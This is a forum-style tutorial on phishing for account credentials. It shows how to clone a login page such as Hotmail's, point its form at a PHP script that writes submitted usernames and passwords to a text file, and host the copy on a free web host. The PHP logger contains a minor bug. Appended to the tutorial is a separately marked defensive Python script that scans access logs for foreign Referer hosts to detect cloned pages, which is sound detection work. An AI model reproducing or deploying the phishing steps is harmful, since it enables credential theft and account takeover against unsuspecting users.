Using Phishing to hack account Part 2

First off go to your login page and save it to a file, to do this in Firefox(the browser you should be using) simply go to File->Save Page as... then you can either save it as just the html document or you can download the whole page which will be more reliable when trying to avoid hosting issues.


Now you will have the page source code which we can edit to fit our needs later on.


Now you will have something along the lines of this:


Code:

form name="loginform" id="loginform" action="/login.php" method="post"

tr
Username:
td class="body"
input class="body" type="text" name="username" size="10" style="width:93px"

/tr

Password:

td class="body"
input class="body" type="password" name="pass" size="10" style="width:93px"
/td
/form


Now edit the normal login php script action to /check.php so it will post to that script when the login button is pushed.


Scripts may differ so be careful at how you edit them. Now we'll make the file that will actually log the username and pass.


Code:

php
$myFile = "userpass.txt";
$fh = fopen($myFile, 'w');
$space = " :: \n";
fwrite($fh, $space);
$password=$_POST['pass'];
fwrite($fh, $password);
$username=$_POST['username'];
fwrite($fh, $username);
fclose($fp);


Use appropriate php notations at start and end of code... (Greater than sign followed by question mark at start and reverse at the end... sorry for not doing it here. Can mail me for more help).


Save that as check.php


So what this does is it opens the userpass.txt file and adds the posted data then closes it, this has to reference back to the script before where it says name="username" and name="pass" this may differ from script to script so make sure you edit them correctly!


Then find a php host to host your scripts, pictures etc... I suggest
http://www.100webspace.net

For those who don't have one available and those who can't afford one that costs money.


Now when you make that upload all the things you need:

1. login.php (your fake login)

2. check.php (your script to write to file)

3. Additional photos and files needed to make login like the real thing.


If you don't want to upload the additional files you must edit all the places in your login script that refer to "/" something to the real url so for an example: if /hotmailpic.bmp is referred to set it to http://www.hotmail.com/hotmailpic.bmp
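Pointing a copied page's images at the real site, as described above, leaves a trace in the real site's own access log: each visitor to the copy fetches those assets with a Referer naming the host of the copy. The following is an added example for the impersonated site's operator, not part of the original post; it scans a Combined Log Format access log for such requests, and the host names, the `OWN_HOSTS` allowlist and the log lines are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Assumption: the only hosts that legitimately embed this site's assets.
OWN_HOSTS = {"www.example-bank.test", "example-bank.test"}
ASSET_EXT = (".bmp", ".png", ".gif", ".jpg", ".css", ".js", ".ico")

# Combined Log Format: ip - user [time] "METHOD path proto" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample lines (documentation IP ranges, reserved test domains).
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Mar/2024:10:01:02 +0000] "GET /logo.bmp HTTP/1.1" 200 5120 "https://www.example-bank.test/login.php" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Mar/2024:10:03:11 +0000] "GET /logo.bmp HTTP/1.1" 200 5120 "http://free-host.example/login.php" "Mozilla/5.0"',
    '203.0.113.44 - - [10/Mar/2024:10:04:50 +0000] "GET /style.css?v=2 HTTP/1.1" 200 900 "http://free-host.example/login.php" "Mozilla/5.0"',
    '192.0.2.15 - - [10/Mar/2024:10:05:00 +0000] "GET /logo.bmp HTTP/1.1" 200 5120 "-" "curl/8.0"',
]

def foreign_asset_referers(lines, own_hosts=OWN_HOSTS):
    """Map each foreign Referer host to the assets, pages and client IPs seen."""
    hits = defaultdict(lambda: {"assets": set(), "clients": set(), "pages": set()})
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # malformed or non-combined-format line
        path = urlsplit(m["path"]).path.lower()
        if not path.endswith(ASSET_EXT):
            continue  # only static assets are of interest here
        ref = urlsplit(m["referer"])
        host = (ref.hostname or "").lower()
        if not host or host in own_hosts:
            continue  # no Referer ("-") or one of our own pages
        hits[host]["assets"].add(path)
        hits[host]["clients"].add(m["ip"])   # visitors who loaded the copy
        hits[host]["pages"].add(ref.path or "/")
    return dict(hits)

if __name__ == "__main__":
    for host, info in foreign_asset_referers(SAMPLE_LOG).items():
        print(host, sorted(info["pages"]), sorted(info["assets"]), sorted(info["clients"]))
```

The client IPs collected per foreign host are the visitors who rendered the copy, which gives incident response a starting list for account review; a copy that hosts its own images produces no such log entries and needs other signals.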
